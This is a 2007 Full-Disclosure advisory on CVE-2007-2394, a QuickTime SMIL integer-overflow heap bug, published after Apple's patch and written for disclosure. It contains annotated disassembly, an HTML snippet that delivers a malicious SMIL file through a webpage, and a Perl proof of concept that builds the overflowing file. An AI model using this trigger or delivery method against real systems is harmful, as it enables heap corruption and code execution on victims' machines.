[<prev] [next>] [day] [month] [year] [list]
Message-ID: <722e995f0709030728u4a63ad59odc56afb28f70328f@mail.gmail.com>
Date: Mon, 3 Sep 2007 16:28:20 +0200
From: "David Vaartjes" <d.vaartjes.nospam@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Apple QuickTime integer overflow vulnerability
when parsing SMIL file
======================================================================
Apple QuickTime integer overflow vulnerability when parsing SMIL file
======================================================================
Date: 09/03/2007
Author: David Vaartjes <d.vaartjes at gmail.com>
Identifier: CVE-2007-2394
Revision: 0.2
----------------------------------------------------------------------
AFFECTED VERSIONS
----------------------------------------------------------------------
Researched on QuickTime 7.1.3 running on Windows 2000 SP4.
iDefense confirmed the existence of this vulnerability in version
7.1.3 and 7.1.5 for Windows XP SP2 and Mac OS X also [1]. As QuickTime
binaries for Windows XP and Vista are identical, this issue will
affect QuickTime running on Windows Vista also.
----------------------------------------------------------------------
FIXED VERSIONS
----------------------------------------------------------------------
Apple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS
X v10.4.9 or later, Windows Vista and Windows XP SP2 to address this
issue. See [2] for additional information about this update.
QuickTime 7.2 is not available for the Windows 2000 platform.
Presumably, Apple dropped support for this platform.
----------------------------------------------------------------------
PRODUCT DESCRIPTION
----------------------------------------------------------------------
QuickTime is Apple's media player product. According to Apple,
QuickTime is downloaded over 10 million times a month. According to
Secunia, QuickTime is currently installed on over 50% of PCs [3].
The Synchronized MultiMedia Integration Language (SMIL) provides a
high-level scripting syntax for describing multimedia presentations.
SMIL files are text files that use XML-based syntax to specify what
media elements to present and where and when to present them.
----------------------------------------------------------------------
VULNERABILITY DESCRIPTION
----------------------------------------------------------------------
An integer overflow vulnerability exists in a part of QuickTime.qts
that calculates the size of a buffer that stores the title and author
fields of a SMIL file. This can be exploited to overflow that heap
buffer with user supplied content, which eventually can result in the
execution of arbitrary code.
----------------------------------------------------------------------
VULNERABILITY DETAILS
----------------------------------------------------------------------
The integer overflow can be triggered by creating a SMIL file
containing a title and author field of a specific length.
--
<smil>
<head>
<meta name="title" content="specific-length"/>
<meta name="author" content="specific-length"/>
</head>
</smil>
--
When such a SMIL file is parsed the length value of the author field
is stored in a short int data type (16 bit) without bounds checking.
In sub_66952B50(), this value is (sign) extended to a long int data
type (32 bit).
--
66952C9A push eax
66952C9B call sub_668B57D0
66952CA0 --> movsx eax, word ptr [esp+2Ch+var_C]
66952CA5 mov edx, [esp+2Ch+arg_4]
66952CA9 lea ecx, [esp+2Ch+var_10]
--
So, when the length of the author field is >= 0x8000 bytes, it will be
extended to a length value between 0xffff8000 and 0xffffffff.
Next, in sub_668DCFD0() the sign extended length of the author field
is added to the length of the title field + 0x20:
--
668DD04D jnz short loc_668DD0A0
668DD04F test ebx, ebx
668DD051 jz loc_668DD1EB
668DD057 --> lea eax, [edi+ebx] // edi holds the length of
// the title field + 0x20.
// ebx holds the sign
// extended length of the
// author field.
668DD05A push eax
668DD05B push ecx
--
In sub_668DCA60(), 4 is added to the result of the calculation:
--
668DCB37 test edi, edi
668DCB39 jz short loc_668DCB40
668DCB3B --> lea eax, [edi+4] // edi holds the result
668DCB3E jmp short loc_668DCB42
--
Next, in sub_668F5550() the final length value is used as the dwBytes
argument in a call to HeapRealloc():
--
668F555E push eax // dwBytes (user specified)
668F555F push ecx // lpMem
668F5560 push 1 // dwFlags
668F5562 push edx // hHeap
668F5563 --> call ds:HeapReAlloc
--
This allows for the allocation of a controlled amount of memory. For
example, when setting the length of the author field to 0xff00 (65280)
and the length of the title field to 0xdf (223), the following
situation occurs:
1: sub_66952B50():
0x0000ff00 will be sign extended to 0xffffff00.
2: sub_668DCFD0():
0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00
resulting in a length value of 0xffffffff.
3: sub_668DCA60():
0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003.
4: sub_668F5550():
HeapRealloc() will allocate 0x00000003 bytes of memory.
Next, the pointer returned by HeapRealloc() is used by sub_668DCFD0()
as the dest argument in a call to memcpy():
--
668DD08E push ebx // count, length value right
// after sign extension
// (0xffffff00).
668DD08F push edx // src, buffer with user
// supplied (author) content.
668DD090 add eax, esi
668DD092 --> push eax // dest, 3 byte buffer.
668DD093 call _memcpy
668DD098 add esp, 18h
668DD09B jmp loc_668DD1E5
--
This copy action will result in an overflow of the 3 byte heap
buffer with data from the author field (user supplied). Due to the
large amount of data written, this will finally result in an access
violation when memory is read or written outside the heap page. The
exception is handled by the program and execution continues with a
corrupt heap.
For my platform (win2k), when a call to HeapAlloc() is executed the
unlink code of ntdll will "fail" because we have overwritten pointers
in the heap management structures of other heap buffers with our data.
The status of the registers during unlinking is:
--
EAX 78787878 <-- user supplied
ECX 78787878 <-- user supplied
EDX 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
EBX 00000078
ESP 0012EDC8
EBP 0012EF84
ESI 01200000
EDI 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
--
--
77f867e6 mov dword ptr ds:[ecx],eax
77f867e8 mov dword ptr ds:[eax+4],ecx
--
The unlink instructions will result in the following exception:
---------------------------
QuickTimePlayerMain: QuickTimePlayer.exe
"The instruction at "0x77f867e6" referenced memory at "0x78787878".
The memory could not be "written"
---------------------------
This shows that we are able to overwrite 4 bytes anywhere in the
address space of the process with "any" 4 byte value we want, which
can for example be exploited to overwrite function pointers like the
SEH or UEF to gain control of the process. This 4 byte overwrite via
the unlink code does not apply to XPSP2 and W2K3 as "safe unlinking"
is used on these platforms.
----------------------------------------------------------------------
ATTACK VECTORS
----------------------------------------------------------------------
This vulnerability can be triggered by luring a target user into
running a malicious SMIL file locally or via a webpage. In the later
scenario the OBJECT (IE) and/or EMBED (FireFox) tags can be used:
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"
WIDTH="10" HEIGHT="10" >
<!-- malicious SMIL file -->
<PARAM NAME="src" VALUE="poc.smil" />
<EMBED
<!-- available .qtif or .mov file to start up QT for FF -->
SRC="available-sample.qtif"
<!-- malicious SMIL file -->
QTSRC="poc.smil"
WIDTH="10" HEIGHT="10"
PLUGINSPAGE="www.apple.com/quicktime/download"
TYPE="video/quicktime"
/>
</OBJECT>
----------------------------------------------------------------------
PROOF OF CONCEPT
----------------------------------------------------------------------
#!/usr/bin/perl -w
####
# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
#
# Researched on QuickTime 7.1.3 on Windows 2000 SP4.
#
# David Vaartjes <d.vaartjes at gmail.com>
####
$file = "poc.smil";
$padd = "x";
$cop_len = 36;
####
# By choosing the following lengths the
# integer overflow will be triggered.
####
$tit_len = 223;
$auth_len = 65280;
open(FH,">$file") or die "Can't open file:$!";
print FH
"<smil>\n".
"<head>\n".
" <meta name=\"title\" content=\"".$padd x $tit_len."\"/>\n".
" <meta name=\"author\" content=\"".$padd x $auth_len."\"/>\n".
" <meta name=\"copyright\" content=\"".$padd x $cop_len."\"/>\n".
"</head>\n".
"</smil>";
close(FH);
----------------------------------------------------------------------
REFERENCES
----------------------------------------------------------------------
[1] http://labs.idefense.com/intelligence/vulnerabilities/display.php?
id=556
[2] http://docs.info.apple.com/article.html?artnum=305947
[3] http://secunia.com/blog/7/
----------------------------------------------------------------------
DISCLOSURE TIMELINE
----------------------------------------------------------------------
04/02/2007 Initial vendor notification (by iDefense)
04/09/2007 Initial vendor response
07/11/2007 Apple security bulletin & patches available
07/11/2007 Public disclosure of iDefense advisory
09/03/2007 Public disclosure of this advisory
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists